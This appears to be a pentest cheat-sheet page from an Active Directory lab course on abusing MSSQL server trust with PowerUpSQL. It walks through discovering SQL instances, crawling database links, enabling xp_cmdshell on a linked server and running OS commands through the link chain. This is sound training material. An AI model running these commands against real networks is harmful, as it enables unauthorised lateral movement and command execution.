Trust Abuse - MSSQL Servers

MS SQL servers are generally deployed in plenty in a Windows domain.

SQL Servers provide very good options for lateral movement as domain users can be mapped to database roles.

For MSSQL and PowerShell hackery, lets use PowerUpSQL https://github.com/NetSPI/PowerUpSQL

Discovery (SPN Scanning)

Get-SQLInstanceDomain

Check Accessibility

Get-SQLConnectionTestThreaded

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Gather Information

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Database Links

A database link allows a SQL Server to access external data sources like other SQL Servers and OLE DB data sources.
In case of database links between SQL servers, that is, linked SQL servers it is possible to execute stored procedures.
Database links work even across forest trusts.

Searching for Database Links:

# Look for links to remote servers

Get-SQLServerLink -Instance dcorp-mssql -Verbose

Enumerating Database Links Manually

select * from openquery("dcorp-sql1",'select * from master..sysservers')

Enumerating Database Links

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql"

Use the -QuertyTarget parameter to run Query on a specific instance (without -QueryTarget the command tries to use xp_cmdshell on every link of the chain)

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql

Last updated 1 year ago